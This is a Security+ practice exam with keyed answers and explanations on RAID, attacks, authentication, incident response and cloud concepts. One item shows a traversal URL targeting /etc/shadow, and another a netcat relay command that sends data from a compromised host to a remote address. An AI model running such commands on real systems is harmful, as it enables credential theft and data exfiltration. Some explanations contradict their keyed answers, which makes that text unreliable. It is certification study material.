
Cybersecurity Concepts and Techniques, Exams of Computer Security

This document covers a wide range of cybersecurity topics, including RAID configuration, buffer overflow exploits, brute force attacks, Bluetooth technology, data injection, APT attacks, insider threats, privilege escalation, shoulder surfing, least privilege, security through obscurity, SMS authentication, virtualization, access control methods, data loss prevention, identity management, routing protocols, security orchestration and response, data clearing, data exfiltration, vulnerability management, and data correlation. It provides a comprehensive overview of cybersecurity concepts, techniques, and best practices, making it a valuable resource for students, security professionals, and lifelong learners interested in the fundamentals of cybersecurity.

Typology: Exams

2024/2025

Available from 10/13/2024

zaza-maica


Jason Udemy CompTIA Security+ (SY0-601) Practice Exam #3 2024-2025. Quizzes & Correct Ans. Graded A+

(Sample Simulation - On the real exam for this type of question, you may receive a list of different RAID types and be asked to visually display which hard drives in the RAID are used for redundant data storage as either a stripe or a mirror. You will then have to identify which RAID type is most appropriate for each type of server shown.)

You are configuring a RAID drive for a Media Streaming Server. Your primary concern is the speed of delivery of the data. This server has two hard disks installed. What type of RAID should you install, and what type of data will be stored on Disk 1 and Disk 2?
- RAID 0 - Disk 1 (Stripe) and Disk 2 (Stripe)
- RAID 1 - Disk 1 (Mirror) and Disk 2 (Mirror) (Incorrect)
- RAID 1 - Disk 1 (Stripe) and Disk 2 (Stripe)
- RAID 0 - Disk 1 (Mirror) and Disk 2 (Mirror)
- ANS: RAID 0 - Disk 1 (Stripe) and Disk 2 (Stripe)

OBJ-2.5: Since this is a Media Streaming Server, you should implement a RAID 0, which provides disk striping across both drives. This will increase the speed of the data delivery but provides no redundancy. If you were concerned with redundancy, then you should choose a RAID 1, which uses a mirror of the data on both hard disks. You cannot use a RAID 5 since it requires a minimum of 3 disk drives and stripes the data across the hard disks. You also cannot use a RAID 6 since this requires at least 4 hard disks with dual parity and disk striping. A RAID 10 also requires 4 hard disks and is a mirror of striped drives (combining the benefits of RAID 1 and RAID 0).

A customer brought in a computer that has been infected with a virus. Since the infection, the computer began redirecting all three of the system's web browsers to a series of malicious websites whenever a valid website is requested. You quarantined the system, disabled the system restore, and then performed the remediation to remove the malware. You have scanned the machine with several anti-virus and anti-malware programs and determined it is now cleaned of all malware. You attempt to test the web browsers again, but a small number of valid websites are still being redirected to a malicious website. Luckily, the updated anti-virus you installed blocked any new malware from infecting the system. Which of the following actions should you perform NEXT to fix the redirection issue with the browsers?
- Reformat the system and reinstall the OS
- Verify the hosts file has not been maliciously modified
- Perform a System Restore t
- ANS: Verify the hosts file has not been maliciously modified

OBJ-1.4: Browser redirection usually occurs if the browser's proxy is modified or the hosts.ini file is modified. If the redirection occurs only for a small number of sites or occurs in all web browsers on a system, it is most likely a maliciously modified hosts.ini file. The hosts.ini file is a local file that allows a user to specify specific domain names to map to particular addresses. It works as an elementary DNS server and can redirect a system's internet connection. For example, if your children are overusing YouTube, you can change YouTube.com to resolve to YourSchool.edu for just your child's laptop.

A cybersecurity analyst conducts an incident response at a government agency when she discovers that attackers had exfiltrated PII. Which of the following types of breaches has occurred?
- Financial breach
- Privacy breach
- Proprietary breach
- Integrity breach
- ANS: Privacy breach

OBJ-4.5: A data breach is an incident where information is stolen or taken from a system without the system's owner's knowledge or authorization. If sensitive personally identifiable information (PII) was accessed or exfiltrated, then a privacy breach has occurred. If information like trade secrets were accessed or exfiltrated, then a proprietary breach has occurred. If any data is modified or altered, then an integrity breach has occurred. If any information related to payroll, tax returns, banking, or investments is accessed or exfiltrated, then a financial breach has occurred.

A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following output (output not shown). Which of the following statements is true based on this output?
- 10.0.19.121 is a client that is accessing an SSH server over port 52497
- 11.154.12.121 is under attack from a host at 10.0.19.
- 11.154.12.121 is a client that is accessing an SSH server over port 52497 (Incorrect)
- 10.0.19.121 is under attack from a host at 11.154.12.121
- ANS: 10.0.19.121 is a client that is accessing an SSH server over port 52497

OBJ-4.1: This output from the tcpdump command is displaying three packets in a larger sequence of events. Based solely on these three packets, we can only be certain that the server (11.154.12.121) runs an SSH server over port 22. This is based on the first line of the output. The second and third lines are the server responding to the request and sending data back to the client (10.0.19.121) over port 52497. There is no evidence of an attack against either the server or the client based on this output since we can only see the headers and not the content being sent between the client and server.

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?
- Buffer overflow
- Directory traversal
- SQL injection
- XML injection
- ANS: Directory traversal

OBJ-1.3: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. XML injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input.

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output (output not shown). What type of attack was most likely being attempted by the attacker?
- Impersonation
- Password spraying (Incorrect)
- Credential stuffing
- Brute force
- ANS: Brute Force

OBJ-1.2: This is an example of a brute force attack. Unlike password spraying, which focuses on attempting only one or two passwords per user, a brute force attack focuses on trying multiple passwords for a single user. The goal of this attack is to crack the user's password and gain access to their account. Password spraying, instead, refers to the attack method that takes a large number of usernames and loops them with a single password. We can use multiple iterations using several different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraudulent purposes. Credential stuffing is the automated injection of breached username/password pairs to fraudulently gain access to user accounts. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack the account for their purposes.

A macOS user is browsing the internet in Google Chrome when they see a notification that says, "Windows Enterprise Defender: Your computer is infected with a virus, please click here to remove it!" What type of threat is this user experiencing?
- Pharming
- Worm
- Rogue anti-virus
- Phishing
- ANS: Rogue anti-virus

OBJ-1.1: Rogue anti-virus is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and into paying money for a fake malware removal tool (that actually introduces malware to the computer). It is a form of scareware that manipulates users through fear, and a form of ransomware. Since the alert is being displayed on a macOS system but appears to be meant for a Windows system, it is obviously a scam or fake alert and most likely a rogue anti-virus attempting to infect the system. Phishing is an email-based social engineering attack in which the attacker sends an email from a supposedly reputable source, such as a bank, to try to elicit private information from the victim. Phishing attacks target an indiscriminate large group of random people. A worm is a standalone malware computer program that replicates itself to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. A worm can spread on its own, whereas a virus needs a host program or user interaction to propagate itself. Pharming is a type of social engineering attack that redirects a request for a website, typically an e-commerce site, to a similar-looking, but fake, website. The attacker uses DNS spoofing to redirect the user to the fake site.

A new smartphone supports users' ability to
transfer a photograph by simply placing their phones near each other and "tapping" the two phones together. What type of technology does this most likely rely on?
- BT
- NFC
- RF
- IR
- ANS: NFC

OBJ-1.4: Near-field communication (NFC) is a set of communication protocols that enable two electronic devices, one of which is usually a portable device such as a smartphone, to establish communication by bringing them within 4 cm of each other. This is commonly used for contactless payment systems, transferring contacts, or transferring a file from one device to another. Bluetooth (BT) is a wireless technology standard used for exchanging data between fixed and mobile devices over short distances using UHF radio waves in the industrial, scientific, and medical radio bands from 2.402 GHz to 2.480 GHz and building a personal area network (PAN). Bluetooth is commonly used when connecting wireless devices like mice, trackpads, headphones, and other devices. Infrared (IR) was a wireless networking standard supporting speeds up to about 4 Mbps with a direct line of sight for communications. Infrared sensors are used in mobile devices and with IR blasters to control appliances. While infrared (IR) used to be commonly used to connect wireless mice and keyboards to a laptop in the 1990s, it has fallen out of favor in the last 10-15 years since Bluetooth is more reliable and does not require a direct line of sight between the device and the laptop. Radio frequency (RF) is the propagation of radio waves at different frequencies and wavelengths. For example, Wi-Fi network products use a frequency of either 2.4 GHz or 5 GHz.

A penetration tester has issued the following command on a victimized host: nc -l -p 8080 | nc 192.168.1.76 443. What will occur based on this command?
- Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443
- Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080
- Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76
- Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080
- ANS: Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1. port 443

OBJ-4.1: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command's execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them to cause an error or failure condition. Which of the following is the laboratory performing?
- Stress testing
- Fuzzing
- User acceptance testing
- Security regression testing
- ANS: Fuzzing

OBJ-3.2: Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User acceptance testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not harm its security; it is therefore of high significance, and the interest in such approaches has steadily increased. Stress testing verifies the system's stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions.

A software assurance test analyst performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which technique is the analyst utilizing?
- Static code analysis
- Known bad data injection
- Fuzzing
- Sequential data sets
- ANS: Fuzzing

OBJ-3.2: Fuzzing is an automated software assessment technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions (crashes), failing built-in code assertions, or potential memory leaks. Static code analysis is a method of debugging by examining source code before a program is run. Known bad data injection is a technique where data already known to cause an exception or fault is entered as part of the testing/assessment; it does not use randomly generated data sets.

After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company's network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company's information security team. How would you best classify this threat?
- Insider threat
- Advanced persistent threat (APT)
- Spear phishing
- Privilege escalation
- ANS: Advanced persistent threat (APT)

OBJ-1.5: An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. An APT attack intends to steal data rather than to cause damage to the network or organization. An APT refers to an adversary's ongoing ability to compromise network security, obtain and maintain access, and use various tools and techniques. They are often supported and funded by nation-states or work directly for a nation-state's government. Spear phishing is the fraudulent practice of sending emails ostensibly from a known or trusted sender to induce targeted individuals to reveal confidential information. An insider threat is a malicious threat to an organization from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization's security practices, data, and computer systems. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. While an APT may use spear phishing, privilege escalation, or an insider threat to gain access to the system, the scenario presented in this question doesn't specify what method was used. Therefore, APT is the best answer to select.

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store's IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions?
- These devices are insecure and should be isolated from the internet
- These devices should be scanned for viruses before installation
- These devices should be isolated from the rest of the enterprise network
- There are no new risks due to the install and the company has a stronger physical security posture
- ANS: These devices should be isolated from the rest of the enterprise network

OBJ-2.6: While the physical security posture of the company has been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store's network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don't necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network and install the video cameras, alarms, and locks on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn't protect them long-term.

An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building's main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?
- Social engineering
- Spoofing
- Shoulder surfing
- Tailgating
- ANS: Tailgating

OBJ-1.1: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim's shoulder. Spoofing is the act of disguising a communication from an unknown source as being from a known, trusted source.

An independent cybersecurity researcher has contacted your company to prove a buffer overflow vulnerability exists in one of your applications. Which technique would have been most likely to identify this vulnerability in your application during development?
- Dynamic code analysis (Incorrect)
- Pair programming
- Static code analysis
- Manual Peer Review
- ANS: Static code analysis

OBJ-3.4: Buffer overflows are most easily detected by conducting a static code analysis. Manual peer review or pair programming methodologies might have been able to detect the vulnerability. Still, they do not have the same level of success as a static code analysis using proper tools. The DevSecOps methodology would also improve the likelihood of detecting such an error but still relies on human-to-human interactions and human understanding of source code to detect the fault. Dynamic code analysis also may have detected this if the test found exactly the right condition. Still, again, a static code analysis tool is designed to find buffer overflows more effectively.

An internet marketing company decided that they didn't want to follow the rules for GDPR because it would create too much work for them. They wanted to buy insurance, but no insurance company would write them a policy to cover any fines received. They considered how much the fines might be and decided to ignore the regulation and its requirements. Which of the following risk strategies did the company choose?
- Avoidance (Incorrect)
- Transference
- Mitigation
- Acceptance
- ANS: Acceptance

OBJ-5.4: The internet marketing company initially tried to transfer the risk (buy insurance) but then decided to accept the risk. To avoid the risk, the company would have changed how it did business or would prevent European customers from signing up on their mailing list using geolocation blocks.

As a
cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results? An uncredentialed scan of the network was performed The scanner failed to connect with the majority of workstations The network has an exceptionally strong security posture The scanner was not compatible with the devices on your network - ANSAn uncredentialed scan of the network was performed OBJ-1.7: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network's vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report. Christina is auditing the security procedures related to the use of a cloud- based online payment service. She notices that the access permissions are set so that a single person can not add funds to the account and transfer funds out of the account. What security principle is most closely related to this scenario? Security through obscurity Dual control authentication Separation of duties Least privilege (Incorrect) - ANSSeparation of duties OBJ-5.3: Separation of duties is the concept of having more than one person required to complete a task. In business, the separation by sharing more than one individual in a single task is an internal control intended to prevent fraud and error. In this case, one person can transfer money in, while another must transfer money out. Dual control authentication is used when

performing a sensitive action and requires two different users to log in. Least privilege is the concept and practice of restricting access rights for users, accounts, and computing processes to only those resources required to perform routine, legitimate activities. Security through obscurity is the reliance on security engineering in design or implementation by using secrecy as the main method of providing security to a system or component. Dion Training has just completed an assessment as part of its disaster recovery planning. The assessment found that the organization can only tolerate a maximum of 30 minutes of downtime for their public-facing webserver. Which of the following metrics would best represent this period of time? RPO MTTR RTO MTBF - ANSRTO OBJ-5.4: The Recovery Time Objective (RTO) is the targeted duration of time and a service level within which a business process must be restored after a disaster (or disruption) to avoid unacceptable consequences associated with a break in business continuity. In this example, 30 minutes would be the RTO. Dion Training is currently undergoing an audit of its information systems. The auditor wants to understand better how the PII data from a particular database is used within business operations. Which of the following employees should the auditor interview? Data steward Data owner Data protection officer Data controller - ANSData protection officer OBJ-5.5: The primary role of the data protection officer (DPO) is to ensure that her organization processes the personal data of its staff, customers, providers, or any other individuals (also referred to as data subjects) in compliance with the applicable data protection rules. They must understand how any privacy information is used within business operations. Therefore, they are the best person for the auditor to interview to get a complete picture of the data usage. Dion Training's offices utilize an open concept

floor plan. They are concerned that a visitor might attempt to steal an external hard drive and carry it out of the building. To mitigate this risk, the security department has recommended installing security cameras clearly visible to both employees and visitors. What type of security control do these cameras represent? Corrective Administrative Compensating Deterrent - ANSDeterrent OBJ-5.1: A deterrent control is designed to discourage the violation of a security policy. Since the cameras are clearly visible, they are acting as a deterrent control. Corrective control is one that is used to fix or eliminate a vulnerability. A compensating control is used to minimize a vulnerability when it is deemed too difficult or impractical to correct the vulnerability fully. Administrative control is used to create a policy or procedure to minimize or eliminate a vulnerability. During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization's AAA services manager? SMS messages may be accessible to attackers via VoIP or other systems SMS should be paired with a third factor SMS is a costly method of providing a second factor of authentication SMS should be encrypted to be secure - ANSSMS messages may be accessible to attackers via VoIP or other systems OBJ-2.4: NIST's SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones). A third factor is typically not a user-friendly recommendation and would be better handled by replacing SMS with the proposed third factor. SMS is not a costly method since it can be deployed for less than $20/month at scale. During which incident response phase is the preservation of evidence performed? Post-incident activity Containment,

eradication, and recovery Preparation Detection and analysis - ANSContainment, eradication, and recovery OBJ-4.2: A cybersecurity analyst must preserve evidence during the containment, eradication, and recovery phase. They must preserve forensic and incident information for future needs, prevent future attacks or bring up an attacker on criminal charges. Restoration and recovery are often prioritized over analysis by business operations personnel, but taking time to create a forensic image is crucial to preserve the evidence for further analysis and investigation. During the preparation phase, the incident response team conducts training, prepares their incident response kits, and researches threats and intelligence. During the detection and analysis phase, an organization focuses on monitoring and detecting any possible malicious events or attacks. During the post-incident activity phase, the organization conducts after-action reports, creates lessons learned, and conducts follow-up actions to better prevent another incident from occurring. Following a root cause analysis of an edge router's unexpected failure, a cybersecurity analyst discovered that the system administrator had purchased the device from an unauthorized reseller. The analyst suspects that the router may be a counterfeit device. Which of the following controls would have been most effective in preventing this issue? Ensure all anti-virus signatures are up to date Verify that all routers are patched to the latest release Conduct secure supply chain management training Increase network vulnerability scan frequency - ANSConduct secure supply chain management training OBJ-5.3: Anti-counterfeit training is part of the NIST 800- 53r4 control set (SA-19(1)) and should be a mandatory part of your supply chain management training within your organization. All other options may produce security gains in the network. They are unlikely to reliably detect a counterfeit item

or prevent its introduction into the organization's supply chain. Training on detection methodologies (i.e., simple visual inspections) and training for acquisition personnel will better prevent recurrences. How would you appropriately categorize the authentication method being displayed here? One-time password authentication Multifactor authentication Biometric authentication PAP authentication - ANSPAP authentication OBJ-2.4: For the exam, you need to know the different authentication categories and what type of authentication methods belong to each category. A username and password are used as part of the Password Authentication Protocol (PAP) authentication system. A username and password are also considered a knowledge factor in an authentication system. How would you appropriately categorize the authentication method being displayed here? PAP authentication Multifactor authentication One-time password authentication Biometric authentication - ANSMultifactor authentication OBJ-2.4: For the exam, you need to know the different authentication categories and what type of authentication methods belong to each category. This is an example of multifactor authentication because you are using both a username/password combination with an SMS code. This provides a knowledge factor (username/password) and a possession factor (your smartphone) to provide two factors of authentication, making this the best option. In which type of attack does the attacker begin with a normal user account and then seek additional access rights? Remote code exploitation Privilege escalation Spear phishing Cross-site scripting - ANSPrivilege escalation OBJ-1.8: Privilege escalation attacks seek to increase the access level that an attacker has to a target system. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain

elevated access to resources that are normally protected from an application or user. Spear phishing is an email or electronic communications scam targeted at a specific individual, organization, or business. Cross-site scripting (XSS) is a type of injection attack in which malicious scripts are injected into otherwise benign and trusted websites. Remote code execution is the ability of an attacker to run code of their choosing on someone else's computing device, no matter where that device is geographically located.

Jason has installed multiple virtual machines on a single physical server. He needs to ensure that the traffic is logically separated between each virtual machine. How can Jason best implement this requirement?
Create a virtual router and disable the spanning tree protocol
Configure a virtual switch on the physical server and create VLANs
Install a virtual firewall and establish an access control list
Conduct system partitioning on the physical server to ensure the virtual disk images are on different partitions
ANS: Configure a virtual switch on the physical server and create VLANs
OBJ-3.3: A virtual switch is a software component of the hypervisor that provides Layer 2 connectivity between virtual machines. A virtual local area network (VLAN) is a logical network segmentation enforced by switches, physical or virtual. Assigning each VM's virtual NIC to its own VLAN on the virtual switch logically separates each virtual machine's traffic. Partitioning the disk affects only where the disk images are stored, not how network traffic flows.

Julie was just hired to conduct a security assessment of Dion Training's security policies. During her assessment, she noticed that many users were sharing group accounts to conduct their work roles. Julie recommended that the group accounts be eliminated and instead have an account created for each user. What improvement will this recommended action provide for the company?
Increase individual accountability
More routine auditing
Increase password security
More efficient baseline management
ANS: Increase individual accountability
OBJ-5.3:

To adequately provide accountability, the use of shared or group accounts should be disabled. With one account per user, you can log and track each individual's actions, which lets the organization hold users accountable for what they do.

Susan, a help desk technician at Dion Training, has received several trouble tickets today related to employees receiving the same email as part of a phishing campaign. She has determined that the email's malicious link is not being blocked by the company's security suite when a user clicks the link. Susan asked you what action can be performed to prevent a user from reaching the website associated with the phishing email's malicious link. What action do you recommend she utilize?
Add the malicious domain name to your content filter and web proxy's block list
Forward this phishing email to all employees with a warning not to click on the embedded links
Block the IP address of the malicious domain in your firewall's ACL
Enable TLS on your organization's mail server
ANS: Add the malicious domain name to your content filter and web proxy's block list
OBJ-3.3: To prevent a user from accessing the malicious website when the link is clicked, the malicious domain name should be added to the blocklist of the company's content filter and web proxy. This ensures that no device on the network can reach the malicious domain. While blocking the IP address associated with the domain might help for a short time, the malicious domain's owner could quickly change its DNS record to point at a different IP address, and users would again be able to reach the malicious domain and its contents. Enabling TLS on the mail server only encrypts the connection between the email server and its clients; it does not prevent users from clicking the malicious link and reaching the malicious content. While informing users that there is an active phishing attempt being conducted

against the organization is a good idea, forwarding the phishing email with the malicious link will generally cause more users to click the link by accident, which further exacerbates the issue.

The digital certificate on the Dion Training web server is about to expire. Which of the following should Jason submit to the CA to renew the server's certificate?
OCSP
Key escrow
CSR
CRL
ANS: CSR
OBJ-3.9: A CSR (certificate signing request) contains the server's public key and identifying information such as the subject name, is signed with the corresponding private key, and is submitted to the CA (certificate authority) to request a digital certificate. Key escrow stores copies of private keys with a trusted third party, a CRL is a list of revoked certificates, and OCSP is a protocol for checking a certificate's revocation status in real time, returning good, revoked, or unknown.

Tim, a help desk technician, receives a call from a frantic executive who states that their company-issued smartphone was stolen during their lunch meeting with a rival company's executive. Tim quickly checks the MDM administration tool and identifies that the user's smartphone is still communicating with the MDM, and displays its location on a map. What should Tim do next to ensure the stolen device's data remains confidential and inaccessible to the thief?
Perform a remote wipe of the device
Remotely encrypt the device
Identify the IP address of the smartphone
Reset the device's password
ANS: Perform a remote wipe of the device
OBJ-3.5: To ensure the data remains confidential and is not accessed by the thief, Tim should perform a remote wipe of the device from the MDM. This erases any corporate data before anyone can access it. Tim could also reset the device's password, but if the thief guessed or cracked the password, they would still have access to the data. Identifying the smartphone's IP address does nothing to protect the data on the device. Devices should be encrypted BEFORE they are lost or stolen, not after, so the option to remotely encrypt the device is a distractor. To

improve the Dion Training corporate network's security, a security administrator wants to update the configuration of their wireless network to have IPSec built into the protocol by default. Additionally, the security administrator would like for NAT to no longer be required for extending the number of IP addresses available. What protocol should the administrator implement on the wireless network to achieve their goals?
IPv6
IPv4
WEP
WPA2
ANS: IPv6
OBJ-3.1: IPv6 includes IPsec as part of the protocol suite (the original IPv6 node requirements made IPsec support mandatory; RFC 6434 later relaxed this to a SHOULD, so check that it is actually enabled on your devices rather than assuming it). IPv6 also provides a vastly larger address space, eliminating the need for NAT to conserve addresses. IPv4 does not include IPsec or an extended address range by default. WPA2 is the most modern and secure of the wireless encryption standards listed, but it does not include IPsec or extended IP address ranges. WEP is an older, broken wireless encryption standard that provides none of these features either.

Using the image provided, place the port numbers in the correct order with their associated protocols:
161, 22, 110, 23
22, 110, 161, 23
23, 110, 22, 161
110, 161, 23, 22
ANS: 22, 110, 161, 23
OBJ-3.1: For the exam, you need to know your ports and protocols. Secure Copy (SCP) operates over TCP port 22, since it runs on top of SSH. Telnet operates over TCP port 23. The Simple Network Management Protocol (SNMP) operates over UDP port 161. Post Office Protocol 3 (POP3) operates over TCP port 110.

Using the image provided, select four security features that you should use to best protect your servers in the data center. This can include physical, logical, or administrative protections.
Antivirus, Mantrap, Cable lock, GPS tracking
GPS tracking, Biometrics, Proximity badges, Remote wipe
Strong passwords, Biometrics, Mantrap, Cable lock
FM-200, Biometric locks, Mantrap, Antivirus
ANS: FM-200, Biometric locks, Mantrap, Antivirus
OBJ-2.7: The best option based on your choices is FM-200, Biometric locks,

Mantrap, and Antivirus. FM-200 is a clean-agent fire suppression system commonly used in data centers and server rooms because it extinguishes a fire without the water damage a sprinkler system would cause. Biometric locks are often used on the access doors of high-security areas; biometric authentication could also be used on a server itself with a USB fingerprint reader. Mantraps are often used as part of securing a data center: the mantrap forms a boundary between a lower-security area (such as the offices) and the higher-security area (the server room) and prevents tailgating. Antivirus should be installed on servers, since it can use signature-based scans to check files before they are executed.

What containment technique is the strongest possible response to an incident?
Isolating affected systems
Isolating the attacker
Enumeration
Segmentation
ANS: Isolating affected systems
OBJ-4.4: Isolation involves removing an affected component from whatever larger environment it is part of. This can range from removing a server from the network after it has been the target of a DoS attack to placing an application in a sandboxed virtual machine (VM) outside the host environment it usually runs on. Segmentation-based containment achieves only partial isolation of a host or group of hosts using network technologies and architecture: VLANs, routing/subnets, and firewall ACLs prevent the hosts from communicating outside the protected segment, but they can still talk within it. Removal is not an industry term, but it would be a synonym for isolation. Enumeration is the process of extracting usernames, machine names, network resources, shares, and services from a system; it is a reconnaissance step, not a containment technique. Isolating the attacker would only stop their direct two-way communication with, and control of, the affected system. It is not the strongest response, since malicious code could still be running on the victimized machine. What is the lowest layer (bottom layer) of a bare-metal

virtualization environment?
Host operating system
Physical hardware
Hypervisor
Guest operating system
ANS: Physical hardware
OBJ-2.2: The bottom layer of a bare-metal (Type 1) environment is the physical hardware. The hypervisor runs directly on that hardware and mediates the guest operating systems' access to it. The bare-metal approach does not have a host operating system. A hypervisor is the program that runs and manages one or more virtual machines on a computer. A host operating system is an operating system that runs a (Type 2) hypervisor as an application.

What is used as a measure of biometric performance to rate the system's ability to correctly authenticate an authorized user by measuring the rate that an unauthorized user is mistakenly permitted access?
Crossover error rate
False acceptance rate
Failure to capture
False rejection rate
ANS: False acceptance rate
OBJ-2.4: The false acceptance rate (FAR), or Type II error rate, measures the likelihood that the biometric system will incorrectly accept an access attempt by an unauthorized user. The false rejection rate (FRR), or Type I error rate, is calculated from the number of times an authorized user is denied access. The crossover error rate (CER) is the point, reached by tuning the matching threshold, at which FAR and FRR are equal; a lower CER indicates a more accurate system. Failure to capture is the rate at which the sensor cannot obtain a usable sample at all.

What problem can you solve by using Wireshark?
Performing packet capture and analysis on a network
Tracking source code version changes
Validating the creation dates of web pages on a server
Resetting the administrator password on three different servers
ANS: Performing packet capture and analysis on a network
OBJ-4.1: Wireshark is a free and open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development, and education. It cannot perform any of the other three tasks.

What type of malware changes its binary pattern in its code on specific dates or times to avoid detection by antimalware software?
Logic bomb
Ransomware
Polymorphic virus

Trojan
ANS: Polymorphic virus
OBJ-1.2: A polymorphic virus alters its binary code (typically by re-encrypting its body with a new key and mutating the decryption routine each time it spreads) to avoid detection by antimalware scanners that rely on signature-based detection. Because its signature keeps changing, the virus evades detection. A logic bomb is code that triggers on a date, time, or condition, but it does not rewrite itself to evade signatures.

What type of weakness is John the Ripper used to test during a technical assessment?
File permissions
Passwords
Usernames
Firewall rulesets
ANS: Passwords
OBJ-4.1: John the Ripper is a free, open-source password cracking tool. It tests the strength of passwords during a technical assessment by attempting to recover them from their hashes, and it supports dictionary (wordlist), rule-based, and brute-force attacks.

When you purchase an exam voucher at diontraining.com, the system only collects your name, email, and credit card information. Which of the following privacy methods is being used by Dion Training?
Anonymization
Tokenization
Data masking
Data minimization
ANS: Data minimization
OBJ-5.5: Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. Reducing what information is collected reduces the amount and type of information that must be protected. Since we only need your name and email to deliver the voucher and your credit card to receive payment for it, we do not collect any additional information such as your home address or phone number. Data masking means that all or part of a field's contents is redacted, for example by substituting every character with x; it is not reversible. Tokenization means that all or part of the data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault if necessary, so tokenization is a reversible technique. Data anonymization is the process of removing personally identifiable information from data sets so that the people the data describes remain anonymous. Which cloud computing concept

is BEST described as focusing on the replacement of applications and programs on a customer's workstation with cloud-based resources?
IaaS
DaaS
SaaS
PaaS
ANS: SaaS
OBJ-2.2: Software as a Service (SaaS) is a cloud computing service that enables a service provider to make applications available over the Internet to end users. This can be a calendar, scheduling, invoicing, word processor, database, or other program. For example, Google Docs and Office 365 are both word processing SaaS solutions. Infrastructure as a Service (IaaS) is a cloud computing service that enables a consumer to outsource the purchase of computing equipment and the running of a data center. Platform as a Service (PaaS) is a cloud computing service that enables consumers to rent fully configured systems that are set up for specific purposes. Desktop as a Service (DaaS) provides a fully virtualized desktop environment from within a cloud-based service. It is a cloud-hosted form of VDI (Virtual Desktop Infrastructure) and is gaining adoption in large enterprises focused on increasing their security and minimizing their operational expenses.

Which of the following access control methods utilizes a set of organizational roles in which users are assigned to gain permissions and access rights?
RBAC
MAC
ABAC
DAC
ANS: RBAC
